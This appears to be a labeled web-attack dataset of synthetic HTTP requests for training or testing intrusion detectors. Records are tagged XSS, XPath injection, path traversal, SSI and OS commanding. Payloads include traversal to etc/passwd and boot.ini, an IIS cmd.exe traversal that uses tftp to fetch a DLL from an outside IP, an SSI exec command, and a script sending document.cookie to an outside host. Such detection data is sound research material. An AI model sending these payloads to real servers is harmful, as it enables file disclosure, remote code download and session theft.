If-Match: *
If-None-Match: "MRQ@2WAEeFHnL0S"
If-Range: Wed, 13 Jun 07 20:48:57 GMT
Max-Forwards: 97
Pragma: cnIs=aryeu
Proxy-Authorization: NTLM OWl0bmdqbmhuZTZNbmllYnJUS1NlZTBvbW5yaXJvRWFpZ2VlaGUxZURzYWd4
Referer: /39qha/le2e/0tee.jsp
TE: gzip;q=0.6,chunked;q=0.0,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/1.8 (X11; U; Linux i586 9.0; rm-T1; rv:2.9.9) Gecko/73121447
UA-CPU: Sparc
Via: 4tt/5.1 233.254.38.37:2703
Transfer-Encoding: identity
Warning: 500 www.csfpew.js "Upisof2goah" 
X-Forwarded-For: 42.158.87.228
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

etlhalmetpcgn1=6 &puVZnNosoi=iu7F0&yrhsvwats=saao be0Ia&at=32NKHz2QYUO&mtVaeraz=oXa38nTzs5n&6anci8e=lnlkUe62rnof&hoomDjs5h3lqf=..\..\..\..\..\..\..\..\..\WINNT\system.ini&9laOQmD=lG9-O&iCTGF=bb> c&Rmailj0DnodeQ3=zedKedc)s;tateit 

End - Id: 45355
Start - Id: 49630
class: XPathInjection
GET /hTO/qWnLRkUeNbaOU2yl/Xgtrsrbu/yaStdTseIiZ7ttse/iFtxmSb_FZW3Q/9ajAWuH1Uzg/esr/.b6X3J3G-/2jOIY/htaccesRKbT.exe?shutdownselectqY=ywsystemea&2ORchhiu9s=cw6AyX1&enis8e=19&helh=rA4&xoptnodeXmbetweenenetcatBp6=yl+8%25%3Dtg%249&isbap1D8x=0855&enit3znwji=tssinsoiu&hi8ymGepnaxd8m=Ddtnrh%27++++or++++%28i++++%3C++++count%28n07Oh%2Fchild%3A%3Atext%28%29%29++++and+++j+%3C+++++count%28rr%2Fchild%3A%3Acomment%28%29%29++++and++k+++%3C++count%28tnte%2Fchild%3A%3A*%29+%29++++or++%27thd%27+%3D++%27+tizenh%27+++++or&weodaccl5to=lrL8w9Jidh HTTP/1.0
Host: www.irRroeadh.it
Connection: close
Accept: video/mpeg;q=0.4
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 72.69.9.83
Cookie: eaahSiegni= eLbe8
Cookie2: $Version="34"
Date: Tue, 04 Mar 08 13:43:57 CET
ETag: "GMdmS@y1YneGll6"
Expect: 100-continue
From: nUasei3i@d2es4pty6e.biz
If-Modified-Since: Fri, 13 Apr 07 14:00:27 UTC
If-Unmodified-Since: Wed, 26 Nov 08 16:35:31 CET
If-Match: *
If-None-Match: "9I-KN992UTWIsHB0t"
If-Range: *
Max-Forwards: 9
MIME-Version: 6.0
Pragma: no-cache
Proxy-Authorization: NTLM YmVuNjVoOXRhdHJlbmVkanNzYWhuY1Qzc1Nla3NvZW5obmh0
Authorization: Basic Y0hldm96QTo5ZWVlZVRlcw==
Range: 31-025167,936-84
Referer: http://www.v0rsnaRt.fr/owAredN/adprh/geLofsi/friFniG/hdro.tiff
TE: trailers,trailers,trailers
Trailer: Pragma
User-Agent: Mozilla/9.9 (compatible; Konqueror/1.2; Linux i586; ituo6o70w)
UA-CPU: StrongARM
UA-Disp: 3477,0438,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 3223x940
Via: sLtnu/0.5 182.7.52.205, HTTP/8.3 www.tut1.jpg
Transfer-Encoding: deflate
Upgrade: hZair/3.0, n6coi/9.2, gii/4.7
Warning: 750 www.Semo.html:72929 "jrrA0ies6s28ioso" 
X-Forwarded-For: 118.127.121.36
X-Serial-Number: 9696710
----: -------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 49630
Start - Id: 48117
class: XSS
GET /ioaeEolto/9CrHlocation/dn8sernrknr8Ujx/gmhhojwysce3dindaT/sntAnlyv9s/1cpTCOgGvwVV@4dDe-/skZkWQe7tUCsW5m/0b1r4balmmAztem.asp?sXsY=3351&is=9&zvdnd=%3Cdiv+++style++++%3D++++%22+binding%3A+++++url%28%5Bhttp%3A%2F%2Fwww.lalens.com%2Fscript%2Fead.php4%5D%29%3B+%22+%3E HTTP/1.0
Host: 214.144.86.48:80
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: wgurse-mreyd, egsd-dt, amnttnom-srsitu;q=0.7
Cache-Control: max-age=7438
Client-ip: 228.184.243.149
Cookie: 4aue2n7Oix=5oaq;selmbohtseeed=yHrpRIVLIAW
Cookie2: $Version="832"
Date: Fri, 01 Jun 07 07:27:01 UTC
ETag: W/"wY2g.ylHPrDD1qK1A"
Expect: ahe0tkh
From: bnwioIhh@fnmcaAYfe6.de
If-Modified-Since: Mon, 15 Mar 04 09:33:52 GMT
If-Unmodified-Since: Sun, 05 Sep 04 13:26:50 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 23 Mar 08 01:51:17 CET
Max-Forwards: 71
MIME-Version: 3.4
Pragma: 4eenio=tdfkms
Proxy-Authorization: Digest realm
Authorization: ehtw2 teSjse=oaotilii
Range: 223086-98
Referer: /tCpta/debo2a/ee1h.gz
TE: trailers,trailers
Trailer: Accept-Charset
User-Agent: cqrnio/3.2.9
UA-CPU: 68000
UA-Disp: 367,260,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 6001x2247
Via: 1.0 145.243.65.117, HTTP/0.3 109.41.215.3, 1.0 61.82.74.170:8557
Transfer-Encoding: yrsvso
Upgrade: paleei/6.9, pyefh/6.3, aeu/0.2
Warning: 668 168.38.49.39 "rrsFr0irpvtbsQzh0o" 
X-Forwarded-For: 72.155.7.72
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 48117
Start - Id: 50036
class: XPathInjection
PUT /n4edo/Emimwpmfis8untii/2Pg7CXrggrA/er/iv7lSNYbvuRW5/RUDWbjECwgxQR5G/lG.js? HTTP/1.0
Content-Length: 67
Content-Language: t
Content-Encoding: deflate
Content-MD5: dHB0YnBWcm90SG9zZXRvcg==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 18 Apr 07 09:53:42 GMT
Last-Modified: Thu, 03 Apr 08 21:14:56 GMT
Host: www.ynaif4fii.org:80
Connection: 9Slnee
Accept: */*;q=0.7
Accept-Charset: x-mac-ce;q=0.0, macintosh, x-mac-icelandic, windows-1252, euc-tw;q=0.5
Accept-Encoding: ocfq/Ifn/aariy/child::node()[position()=297]  or   'tE9tLe'   =   '
Accept-Language: *
Cache-Control: only-if-cached
Date: Mon, 20 Feb 06 10:46:34 CET
If-Unmodified-Since: Thu, 06 Mar 08 20:04:12 GMT
If-None-Match: "0O4yeKOwAO8T@-0gpA_"
Max-Forwards: 9
MIME-Version: 4.2
Proxy-Authorization: Digest realm
Authorization: Digest nonce
Referer: /tdioinre/adrp9T5e/wcomf0/qatle/h5bEa.css
User-Agent: Ut5taeoi
Via: FTP/7.8 www.oih8j.gif, 6.2 www.ascfr40.jpeg
X-Forwarded-For: 5.28.189.137
----: ------------------------------------------------

esstlNset=tlrIe&rEfccbp=n6yrQGX3V3&floohp3um= bl-&dtEamccie=rouafrs

End - Id: 50036
Start - Id: 45583
class: PathTransversal
GET /zJU3Q/aleo09ro3/Eyg/acsasrttUeah/mD2cL2w/mDagO0mpCf/nArttBl6rthpyyysm/w9BUs_/tHfmochawhereZOLK3a/lRhb2n-QklsWRy1/nihyntnl/yMYDETuKX9KHJu..css?ihicnncah=o%3A%5Cwindows%5Cboot.ini HTTP/1.0
Host: www.0eNe.be:05
Connection: close
Accept: */*
Accept-Charset: cp-936;q=0.0, windows-1257
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 181.101.28.152
Cookie: rnryest5s=c2(b$ tt ai0ai0ir O;luemoom4=Woetan
Cookie2: $Version="513"
Date: Wed, 21 Mar 07 01:14:16 UTC
ETag: "W@5PqyMvVxHHDy-"
Expect: 100-continue
From: v9zS@tEnsif6n2h.net
If-Modified-Since: Thu, 18 Aug 05 09:09:31 UTC
If-Unmodified-Since: Thu, 29 Nov 07 16:26:04 UTC
If-Match: "V.8LK4n69-kgXicgta"
If-None-Match: *
If-Range: *
Max-Forwards: 002
MIME-Version: 2.5
Pragma: DQ='ueiti'
Proxy-Authorization: NTLM ZXBzeGFlbkxta3QwRGRkcnB5YXBtcTBGbmU4YXJuY2FpTjhkaGx0
Authorization: Digest response="3e092Ba963B0CA1f5a1fBABba2dDf2bE"
Range: 286-378831
Referer: http://www.lrds.net/ehgts/eeilfHr/TaOyde/s9ei/i57ihxer.cfm
TE: chunked;q=0.3,trailers
Trailer: Transfer-Encoding
User-Agent: cirvoesasGwyo9vrrs
UA-CPU: StrongARM
UA-Disp: 6548,353,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 6460x166
Via: 0.6 230.210.43.29, HTTP/1.0 www.rssichs.htm
Transfer-Encoding: gzip
Upgrade: m9e/5.3, eSsw5l/3.4, Vct7rc/0.1, hEwtE/6.8
Warning: 987 134.153.100.236 "eesinenge5NOla6sS" 
X-Forwarded-For: 58.229.7.205
X-Serial-Number: 368281150283459
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45583
Start - Id: 40272
class: SSI
GET /fjB_OqZq5WVRRjWlh/f-5E6ShLERMXZp9.K37.asmx?xl=achild&St=%3C%21--+++++%23exec++cmd%3D%22c%3A%5Cprogra%7E1%5Cq2ysdWroa%5Caom%5CjrroGix.exe++d%3A%5Cqk3o84ah7%5Cwww.aranriiser.org%5Ch2%5Cdatabase.mdb+++%2Fx++++exporttofoxpro%22--%3E HTTP/1.1
Host: www.ntmRdhk.com
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.5
Accept-Language: s-tR;q=0.9, v-ahgtsvtR
Cache-Control: only-if-cached
Client-ip: 52.223.207.82
Cookie: uihp=%;ele0onAsa1alsu=eIuE~window.openod tto3execowanxaccept;AwcsAivoalte=4115574183;pdvaLetooseza=opmntshtpinOae
Cookie2: $Version="651"
Date: Fri, 02 Jul 04 24:15:29 CET
ETag: W/"PvC@pDiEamK-qycb0"
Expect: 100-continue
From: sinl@n3biht.ch
If-Modified-Since: Thu, 15 May 08 17:23:14 UTC
If-Unmodified-Since: Sun, 30 Sep 07 08:43:33 UTC
If-Match: *
If-None-Match: "-TX5SAOWeuikKy.Ctn"
If-Range: Fri, 24 Aug 07 20:38:47 UTC
Max-Forwards: 58
MIME-Version: 9.5
Pragma: no-cache
Proxy-Authorization: NTLM Y1RuZWlyYmludGxvb2NhRXpldHNJZ25zYWRNaFdlZUJvZDI=
Authorization: NTLM Y3NlZXNuaXhsaG9pbnJUMnJtYXNkZGVoZm95RUVlQXlpZWFsbXloaDVzZWVkcGE=
Range: 1030-
Referer: /LdHhgnms/eogn/haxik/aEe0.msf
TE: trailers
Trailer: Authorization
User-Agent: Mozilla/8.0 (Machintosh; U; PPC 3.6; ty-eh; rv:7.1.5) Gecko/25314929
UA-CPU: MIPS
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 6936x3425
Via: 8.3 www.goettee4.shtml, FTP/6.3 www.3et9mro.shtml, 9.5 85.255.95.34
Transfer-Encoding: identity
Upgrade: shUaoo/4.0, eat/0.9, y0aio/2.5, enluo/1.0, siaeN/8.6
Warning: 487 www.1qtdgidu.tiff "h7idno2aalutGrerznAt" "Sun, 05 Mar 06 10:34:02 UTC"
X-Forwarded-For: 234.200.110.255
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40272
Start - Id: 36358
class: PathTransversal
GET /rt2k6Su-5Q9LSd/fawtCjebgrbjVSbiW.png?srdchSO=W&al72gzkk=%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd%2500.html&nwhatetaaehwtw=mUt%3Cl+foshutdownr&yAten=ev6ZA&ulyoes=9R+e%26rEthrc%3F%3Aoevariw&0gTa8=aaegmesHesugihe&tmncnowfbotro=nwab3Me_K&gUPA25B=w&neEo3=9049514&66yM.HdL_RK0=5 HTTP/1.1
Host: www.bapRie.fr
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: *;q=0.9
Accept-Encoding: *;q=0.5
Accept-Language: *
Cache-Control: no-transform
Client-ip: 150.79.127.140
Cookie: 6tfjaC=t8lcsn1xeesutns
Cookie2: $Version="14"
Date: Wed, 26 Jan 05 06:09:19 CET
ETag: W/"FVdxZvFAz4j68bNZ95W0"
Expect: eatl
From: sotSFlSe@qiksat.biz
If-Modified-Since: Fri, 08 Jan 10 02:03:48 UTC
If-Unmodified-Since: Sun, 02 Mar 08 05:20:53 GMT
If-Match: *
If-None-Match: *
If-Range: "cB1oQ@yo3ygkubrCeISc"
Max-Forwards: 3
MIME-Version: 5.3
Pragma: eU4li=eA
Proxy-Authorization: Basic YXVJbnM6ZWhpcjFndHU=
Authorization: Basic dDhhbmNydDpzb3Y0ZQ==
Range: 75-618834,757-411,77394-267269
Referer: http://o3ioau.cz/eTe2p.conf
TE: gzip
Trailer: From
User-Agent: Mozilla/2.3 (Windows; U; Win98 6.5; eg-ez; rv:7.7.2) Gecko/28986152
UA-CPU: MIPS
UA-Disp: 7628,9010,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 6269x194
Via: 6.0 www.oseku9.gif:7801
Transfer-Encoding: gzip
Upgrade: T8m/5.2, fg1ie/5.0, hrhh/0.4
Warning: 864 193.255.239.241 "chohneoi" 
X-Forwarded-For: 217.52.49.74
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36358
Start - Id: 43946
class: OsCommanding
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+tftp%20-i%2062.107.47.226%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.1
Host: 153.119.246.149:80
Connection: close
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: *;q=0.8
Accept-Language: *;q=0.9
Cache-Control: no-transform
Client-ip: 203.44.173.36
Cookie: azabauurmo=eltii|;Totkiyoast1nd=8112802;dNm9oooa8n=fHJPeGIX;suourdauNroiT=rmXee>nup
Cookie2: $Version="4"
Date: Wed, 14 Mar 07 15:23:02 UTC
ETag: "SfHgMhYbzXvv1eK93q"
Expect: Ktdna
From: axenii@lMdner.de
If-Modified-Since: Tue, 04 May 10 02:09:59 UTC
If-Unmodified-Since: Fri, 24 Nov 06 17:25:07 GMT
If-Match: "Ed_MEUpQFIM27pN2sk"
If-None-Match: *
If-Range: "rU0p8lol0k8cG.PieMo"
Max-Forwards: 53
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: enro elaaRn=qkanorol
Authorization: NTLM b3htZWxvc25hc2JpdHNleXRxMHRvZXRvaGVzb05vb2Vo
Range: 40927-72
Referer: /r3s1dtd6/nsnio.jsp
TE: deflate
Trailer: Via
User-Agent: Mozilla/7.6 (Windows; U; Windows NT 8.3; oe-ta; rv:9.2.0) Gecko/71718285
UA-CPU: 68000
UA-Disp: 068,6822,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 539x520
Via: FTP/6.5 173.207.86.37:19, 8.1 www.et7on6ie.html, 2.0 254.93.181.148
Transfer-Encoding: compress
Upgrade: pAn/5.4, eynSnm/6.6
Warning: 327 www.3eSas.css "tdlqjc" "Sat, 26 Jan 08 18:17:22 CET"
X-Forwarded-For: 157.151.213.231
X-Serial-Number: 221610848523557
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43946
Start - Id: 44229
class: OsCommanding
GET /msadc/..���../..���../..���../winnt/system32/cmd.exe?/c+ HTTP/1.1
Host: www.nr1t.org
Connection: eeTr
Accept: text/*, text/xml
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 157.29.164.15
Cookie: coit4elcsbneac=228;c0uwe2e=5596737
Cookie2: $Version="760"
Date: Thu, 09 Jun 05 11:43:41 CET
ETag: "tzNRwsuen.u4CaPKh"
Expect: L2fr=taeh2;o6alf
From: 37idSerd@ombp.uk
If-Modified-Since: Wed, 22 Apr 09 07:55:48 UTC
If-Unmodified-Since: Fri, 23 Dec 05 16:31:24 CET
If-Match: *
If-None-Match: "I2tv5PVee4wFP8yJYk"
If-Range: Tue, 22 Dec 09 21:12:15 UTC
Max-Forwards: 1
MIME-Version: 1.1
Pragma: NuD='0dtugo9'
Proxy-Authorization: Basic aHRybng6ZWxMYQ==
Authorization: todoif 86auyni=mfqem
Range: 734241-576218
Referer: /hnet/f6oTslg/ctlh/lnct.gif
TE: gzip;q=0.7
Trailer: Proxy-Authorization
User-Agent: hTreaofitmAn8
UA-CPU: x86
UA-Disp: 220,5543,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 352x848
Via: 9.5 236.214.221.65, 1.8 246.253.251.27, 2.7 251.200.245.51:06
Transfer-Encoding: hyjlh8; h88og=mtjiTugS
Upgrade: eylet/4.8, moe/0.2, jtiu/7.5, ratas/1.7, ott/5.5
Warning: 551 60.137.215.80:7814 "tgrsetastm" "Mon, 04 Feb 08 20:28:14 GMT"
X-Forwarded-For: 65.185.122.174
X-Serial-Number: 33909969
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44229
Start - Id: 47218
class: XSS
GET /itrc/XP6y89Uq/inputH1Sconnect/8x0aJ60D.91mLoi1/n2yuL2e1Fak9_GDTQU/htspaE4ysikadmrdsn/iSxIGueElWn_/d9ha0s5tchoi9rni/eqbqm/ykceokwaeldmBwito/esSOngsL8qNL_.php3?osJWlsant=%3Cimg+++++src+++%3D+++%22livescript%3A%5Balert%28%27itds8yz94p%27%29%3B%5D++++%22++++%3E&nttebnfc=o%3F%3Ermc HTTP/1.1
Host: www.rbwLt1sEt.st
Connection: keep-alive
Accept: text/html;q=0.1, text/plain
Accept-Charset: *;q=0.8
Accept-Encoding: *;q=0.0
Accept-Language: *;q=0.5
Cache-Control: no-transform
Client-ip: 220.86.207.11
Cookie: ZLgtelnet_=594649;era=fNd-X;uoes8his0ui4a=ecolaHmU;UJVB6GXL= aeahv
Cookie2: $Version="87"
Date: Wed, 06 Jun 07 07:54:57 UTC
ETag: "sffq97EglwyE3Ups"
Expect: bpHcbrce
From: ti73@utlaaob.ch
If-Modified-Since: Sun, 09 May 04 13:50:50 CET
If-Unmodified-Since: Mon, 14 Sep 09 21:01:00 UTC
If-Match: "41KmT5KtwaTSX3pg"
If-None-Match: *
If-Range: "ej1u75kNnOtKjbGRB1C"
Max-Forwards: 161
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: Basic bW5kZ2VrbmU6dWVja2FoaXA=
Authorization: NTLM aXdzb2U5d3Rlcm9zd2RFSWVhZDBhY3Qxem9lbU5tb3J0d2docmhybnR6dG9zZQ==
Range: 4321-2
Referer: /sQI5uN0S.cgi
TE: gzip
Trailer: Range
User-Agent: Mozilla/3.7 (compatible; Konqueror/4.1; Win 9x; jMtos; se4uclnsz8; e0xu5dn)
UA-CPU: 68000
UA-Disp: 4828,524,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 286x017
Via: HTTP/9.7 4.114.234.99, 0.3 214.217.195.236
Transfer-Encoding: gzip
Upgrade: sdloi/4.2, a9og/5.3, Who9/3.5
Warning: 326 133.104.64.243 "thlBedsxran6eholh" 
X-Forwarded-For: 255.235.206.195
X-Serial-Number: 04739435468972088
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47218
Start - Id: 48499
class: XPathInjection
PUT /eVrZNXVe5umuGnhL13/ekimts/vooitttniepse8/htimpctlropi8ies.exe? HTTP/1.0
Content-Length: 135
Content-Language: ludrsei
Content-Encoding: compress
Content-Location: /feoo/kn5toi/sldReaIi.msf
Content-MD5: dTF0bjB6YW9lM2NjZWhyeQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 21 Jan 08 17:34:27 CET
Last-Modified: Sun, 23 Apr 06 02:18:15 CET
Host: 238.126.33.18
Connection: Ebgrsih
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: *;q=0.5
Accept-Language: oasdn-Sfilano, enig-ariIio;q=0.0, cMoPb-o6ootw, lhEeoRrt-n
Cache-Control: max-stale=1
Client-ip: 186.162.234.129
Cookie2: $Version="932"
Date: Tue, 17 Feb 04 21:15:53 GMT
ETag: W/"Z8k6MID8rdOhM91kgfF"
Expect: 9sb4l
From: numhoTo@rsni1ore.com
If-Modified-Since: Sat, 02 Jul 05 01:06:10 GMT
If-Unmodified-Since: Mon, 02 Jul 07 23:15:02 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 30 Sep 09 12:34:24 GMT
Max-Forwards: 14
MIME-Version: 1.8
Authorization: NTLM ZW5hZmVlbm9yYU9mbXNuZ256M1llZTRvSml6dG9GcjZpcHh0c2VDb3l0bg==
Referer: http://ez8S6e.gov/Efho/ahwldoe/pdttjmma/piqsrot/narem.php
TE: trailers
Trailer: Upgrade
User-Agent: Mozilla/2.3 (Machintosh; U; PPC 2.7; Ds-i9; rv:5.8.4) Gecko/56526212
Via: HTTP/7.4 175.165.211.190, HTTP/4.4 219.235.61.30
X-Forwarded-For: 104.189.251.216
X-Serial-Number: 01871
----: -------------

esr6fdadem3=enneYeo'  or 8d3/twnrs/child::node()[processing-instruction()=914]     or   'yUateecs'  = '

End - Id: 48499
Start - Id: 45558
class: PathTransversal
GET /amB4arE/7g/lmcAgBldjiRZwKwbtMI/QvW/J5SFjS0i_fB8in/5SdBfCc/skl2-1/o_@Zc6eOiO.mdb?cwep=Ozetcbr%3Ae%2Buxp_lirS6taqg&an=m%3A%5Cautoexec.bat&31-2fFZDjeO=167&nbt=ojs%3FyEno&MatP49oeedhbotM=0744&nyobgayednoosmt=8991428&hnp4escaesjo7w=6319&llntosuta=934028 HTTP/1.0
Host: 16.99.132.254
Connection: 2crDo
Accept: image/png;q=0.1, image/*
Accept-Charset: *
Accept-Encoding: *;q=0.7
Accept-Language: *;q=0.1
Cache-Control: max-stale=95031
Client-ip: 225.212.174.38
Cookie: nori=tx8anAA
Cookie2: $Version="087"
Date: Fri, 25 Jun 04 12:51:19 CET
ETag: W/"PIDc74pSQbS7aZ15K7I6"
Expect: eeretq5E=a2orjnoo;dn0g
From: kccnlkv2@rodignu.de
If-Modified-Since: Sat, 10 Mar 07 12:14:12 CET
If-Unmodified-Since: Mon, 10 Aug 09 04:12:42 UTC
If-Match: "f9VHwgZRm03tTfOvB@u"
If-None-Match: *
If-Range: Tue, 10 Nov 09 23:51:34 GMT
Max-Forwards: 6175
MIME-Version: 9.4
Pragma: no-cache
Proxy-Authorization: NTLM ZXBzeGFlbkxta3QwRGRkcnB5YXBtcTBGbmU4YXJuY2FpTjhkaGx0
Authorization: Digest response="E22F9eE11467e7b1deeE0c6f3c56A53a"
Range: -7305
Referer: /aaawsshj/atirlot.fgf
TE: deflate,gzip;q=0.2,gzip;q=0.7
Trailer: If-Unmodified-Since
User-Agent: Mozilla/8.6 (Windows; U; Win 9x 0.5; wr-ee; rv:2.3.4) Gecko/37404727
UA-CPU: StrongARM
UA-Disp: 6548,353,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 220x9820
Via: 7.9 38.83.179.127, 9.1 www.qa2smm.tiff
Transfer-Encoding: deflate
Upgrade: tvtmyl/0.9, dEhai/7.5, oiv8C/9.2, beNr/8.8, c9orN/8.6
Warning: 278 227.248.46.198:699 "ihqt4i1" "Mon, 16 Jul 07 06:16:16 UTC"
X-Forwarded-For: 145.196.47.34
X-Serial-Number: 86157391207979195
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45558
Start - Id: 35813
class: XPathInjection
GET /zT1Rq/owi5aTase1taeno1h0/.CcsystemdnodeusrI6S5YmI./el1eu/mZ1/mOO/uDreisnbieyoeorlghu/tezIIT3h8i8e6/tYwn4KJ1_QYR3W/rtri71n6l84mzpAaEnme/pcut/sCadfun.jpeg?ohmnbpteuoi=aarelKio%27+++or++1%3C+++++lfwew%2Fdst8%2Fr%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D621%5D+++or++++%27sdmzC%27+++%3D++++%27&vljdu9rrnhcwe=o999%40hPs%40qEH&6ua2anqit5=aXuqR5yYyX&Tr1M8netcatYUPv8=laaccept++na3aEc%5D&etefeshoibnfO=274542&gmtlnmao5sn6x=78943&echydaassman7j=4&9U4RRd0UbVf3=1940&td5Rond1nzz0to=-6&vesedrthSsom9=11526256&roneLvnsa=wNkM0Q-Moa&tmqtnsdh1as=+ts&psrniyo=8072252 HTTP/1.0
Host: www.s6yeqqdrf.ch
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.5
Cache-Control: max-age=58805
Client-ip: 25.4.155.47
Cookie: Rkoa3oTdm=4adminse)iy6r%eismb;ge2t0ds9eBsiro=trmwvfi;At=2322;evehm0=aYIw7
Cookie2: $Version="2"
Date: Fri, 30 Mar 07 18:30:37 UTC
ETag: "F.kqxYY8TNuKf1u"
Expect: Aesa
From: gH0ez@Sireoah.fr
If-Modified-Since: Thu, 18 Dec 08 12:18:23 GMT
If-Unmodified-Since: Sun, 18 Mar 07 19:14:10 CET
If-Match: "juhBjy0vAF6LU8iDRZ"
If-None-Match: *
If-Range: Tue, 08 Dec 09 23:29:00 UTC
Max-Forwards: 206
MIME-Version: 9.9
Pragma: mf2t=easweAts
Proxy-Authorization: luLc Okt8e=3llo
Authorization: Basic bndlZW46dDBlNw==
Range: 205-0247
Referer: http://www.pean.biz/weiss8f5/atiinoer/gdnshomn/qtphgyuw.sh
TE: trailers,deflate,gzip;q=0.8
Trailer: If-None-Match
User-Agent: Mozilla/4.8 (compatible; Konqueror/5.9; Linux i386; rawifaci)
UA-CPU: x86
UA-Disp: 861,959,8
UA-OS: Linux
UA-Pixels: 4135x5853
Via: 4es/8.2 www.EuiTthpe.png
Transfer-Encoding: identity
Upgrade: oyytm/9.6, hhc/4.5, Ojwace/7.1, toww7E/9.4
Warning: 952 www.gere3lt.gif "ajcLu" "Fri, 03 Aug 07 19:36:17 GMT"
X-Forwarded-For: 43.11.206.228
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35813
Start - Id: 44339
class: OsCommanding
GET /scripts/georgi.asp/..��..��..��file.ext? HTTP/1.0
Host: www.8enca.biz
Connection: keep-alive
Accept: audio/basic;q=0.8, text/*
Accept-Charset: *;q=0.9
Accept-Encoding: *;q=0.8
Accept-Language: ow-m, AsrS9e-t
Cache-Control: no-transform
Client-ip: 216.220.28.19
Cookie: eosleoth=Anm8zy~
Cookie2: $Version="29"
Date: Thu, 11 Aug 05 20:05:31 UTC
ETag: "kwXTvO@4m-@MIi_"
Expect: tnstr3=Ht7tPac;rhjSmod
From: Q0IEeur@zgehtbi59.uk
If-Modified-Since: Tue, 19 Aug 08 04:28:08 GMT
If-Unmodified-Since: Thu, 05 Jul 07 03:45:43 GMT
If-Match: "0Ed436M-Rj3k1HF1-n"
If-None-Match: *
If-Range: Fri, 09 Mar 07 22:55:02 UTC
Max-Forwards: 76
MIME-Version: 1.6
Pragma: Eiilnn='tisHs'
Proxy-Authorization: Digest nc=e078eCD8
Authorization: Basic ZUFvZTpvM2VBc3Nzbw==
Range: -4,7986-,046-946045
Referer: /oei8o.mpg
TE: trailers
Trailer: Max-Forwards
User-Agent: utosas0m1 (tkJlHy.ib; o3vesmh; 4r@XiA; p7R98sAzvr)
UA-CPU: x86
UA-Disp: 8897,9221,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 127x111
Via: FTP/7.4 155.23.177.191:61496, HTTP/6.5 www.rsSe7.htm
Transfer-Encoding: compress
Upgrade: ecbon/5.1, 0dstft/4.6, rh6g/9.8
Warning: 450 137.33.40.57 "ymhep" "Sat, 27 May 06 20:03:51 UTC"
X-Forwarded-For: 81.125.200.90
X-Serial-Number: 4707675607021024979
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44339
Start - Id: 47890
class: XSS
GET /eseajogcauc87ln0aDn/e7vtru0me/hledr7re6/snazrtgDibec/e1VSscript@7fNN_akzi/eipneoTk8s1iwoAey.jpg?tnooxk3hnkrho1s=tazuntbuec8%7Cdo&E1iCR9We=ye%3C%3Eprocessing-instruction&xsbo=oaipe%289&yr=etow&iyfAenuondsfte=%3Cstyle%3E%3C%21--%3C%2Fstyle++%3E%3Cscript%3E%5Bdocument.location.replace%28%27http%3A%2F%2Fwww.etatve.com%2Fcgi-bin%2Fna.cgi%27%2Bdocument.cookie%29%3B%5D%2F%2F--%3E%3C%2Fscript++%3E&tuaaiwobtr=b0th&zIeino=nsydeobjectudarG%3C&AAAf=e75NA&hanranul3er=9&tan=e5HNL7qBL&tilray=e%7En&nV6uJDNK.A0where=sdt+7xyr HTTP/1.0
Host: www.h48nhne.uk:10
Connection: close
Accept: image/*;q=0.0, text/*;q=0.7
Accept-Charset: *
